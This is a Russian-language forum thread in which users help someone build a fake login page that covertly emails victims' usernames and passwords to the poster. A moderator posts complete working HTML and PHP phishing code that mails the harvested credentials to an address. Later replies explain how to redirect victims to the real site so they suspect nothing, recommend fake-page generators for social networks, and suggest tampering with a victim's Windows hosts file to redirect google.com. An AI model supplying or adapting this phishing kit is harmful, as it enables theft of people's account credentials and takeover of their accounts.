Подставная форма, которая отсылает пассворд на почту

Тема в разделе "Как сделать...", создана пользователем OmgImFamous, 18 ноя 2013.

  1. OmgImFamous

    OmgImFamous

    Заблокирован
    Регистр.:
    14 ноя 2007
    Сообщения:
    238
    Симпатии:
    45
    Помогите сделать фейковую форму регистрации

    Вводиш логин и пасс (пасс скрытый) но мне на почту отсылается
     
  2. kadurinho

    kadurinho Shop Script

    Moderator
    Регистр.:
    21 июн 2011
    Сообщения:
    618
    Симпатии:
    248
    Оо
    Обычная форма обратной связи html + обработчик php

    Файл index.html
    HTML:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Воруем пароли :D</title>
    </head>
    <body>
    
    <form method="post" action="send.php">
        <table>
            <tr>
                <td>
                    <p>Имя пользователя:</p>
                    <input type="text" name="name">
                </td>
            </tr>
            <tr>
                <td>
                    <p>Пароль:</p>
                    <input type="password" name="pass">
                </td>
            </tr>
            <tr>
                <td>
                    <input type="submit" value="Отправить">
                </td>
            </tr>
        </table>
    </form>
    
    </body>
    </html>
    Файл send.php
    PHP:
    <?php

    if (isset($_POST['name'])){
        
    $name $_POST['name'];
    }

    if (isset(
    $_POST['pass'])){
        
    $pass $_POST['pass'];
    }

    $mail "example@example.net"// почта, на которую должно приходить сообщение
    $sub "Гыыыы.. Новый ворованный пароль";
    $mes "Имя: $name \nПользуется таким паролем: $pass";

    $send mail ($mail,$sub,$mes,"Content-type:text/plain; charset = utf8\r\n");

    if (
    $send == 'true')
    {
    echo 
    "Отправлено!";
    }
    else
    {
    echo 
    "Не отправлено";
    }
    ?>
     
    OmgImFamous нравится это.
  3. OmgImFamous

    OmgImFamous

    Заблокирован
    Регистр.:
    14 ноя 2007
    Сообщения:
    238
    Симпатии:
    45
    А как скрыть URL?send.php?name=proverka&pass=test1&remember=on
    ну, тут очевидно что, логин proverka, пасс - tes1, жертва может кинуть предьявы.. как скрыть такой URL например на.. send.php?success

    и желательно сделать редирект на сайт донора, т.е..

    if ($send == 'true')
    {
    echo "Обработка данных удалась, через 10секунд Вас перекинет на сайт mail.ru"; // здесь должен сработать редирект
    }
    else
    {
    echo "Ошибка";
    }
    ?>
     
  4. OmgImFamous

    OmgImFamous

    Заблокирован
    Регистр.:
    14 ноя 2007
    Сообщения:
    238
    Симпатии:
    45
  5. gothmog

    gothmog Постоялец

    Регистр.:
    18 июн 2011
    Сообщения:
    60
    Симпатии:
    24
    Делайте редик через пхп функу header, яваскрипт не у всех может быть включен.
     
    ishkval нравится это.
  6. OmgImFamous

    OmgImFamous

    Заблокирован
    Регистр.:
    14 ноя 2007
    Сообщения:
    238
    Симпатии:
    45
    А подробнее? :))
     
  7. yaski

    yaski

    Регистр.:
    21 фев 2010
    Сообщения:
    491
    Симпатии:
    292
    Полно генераторов фейков, например ArxWFakeGen и подобные, указываешь соц.сеть, какие поля отправлять на почту, чуть-чуть стили поправляешь, чтоб актуальные были и пользуешь.
     
  8. maksdekka

    maksdekka Писатель

    Регистр.:
    24 июл 2013
    Сообщения:
    1
    Симпатии:
    1
    Если вы хотите спрятать URL, то есть человек заходит к примеру на google.com и загружается ваша фейковая страница, то вам необходимо изменить hosts. файл в папке Windows/system32/drivers/etc у жертвы написав типо:
    188.123.51.1 google.com
    188.123.51.1 Перейти по ссылке

    где IP адрес это адрес вашего сервера который хранит вашу фейковую страницу.

    Для того чтобы ваш URL не превращался в /send?name=Vasja&password=123
    Необходимо отправлять данные из формы в PHP через POST, пример:
    <form method="POST"...
    <input type="text" name="название поля"...

    в PHP же получать их нужно вот так:
    $name = $_POST['название поля'];

    ---

    А вообще шпионить не хорошо :D
     
  9. yaski

    yaski

    Регистр.:
    21 фев 2010
    Сообщения:
    491
    Симпатии:
    292
    каким-же макаром ты файл hosts изменишь? Если только вручную. Любой антивирь злобно завизжит при попытке доступа программой к этому файлу.
     
  10. maksdekka

    maksdekka Писатель

    Регистр.:
    24 июл 2013
    Сообщения:
    1
    Симпатии:
    1
    А зачем умничать? Автор темы задал вопрос он получил на него ответ (на счет не палить URL подставной страницы). Есть другие предложения? высказывай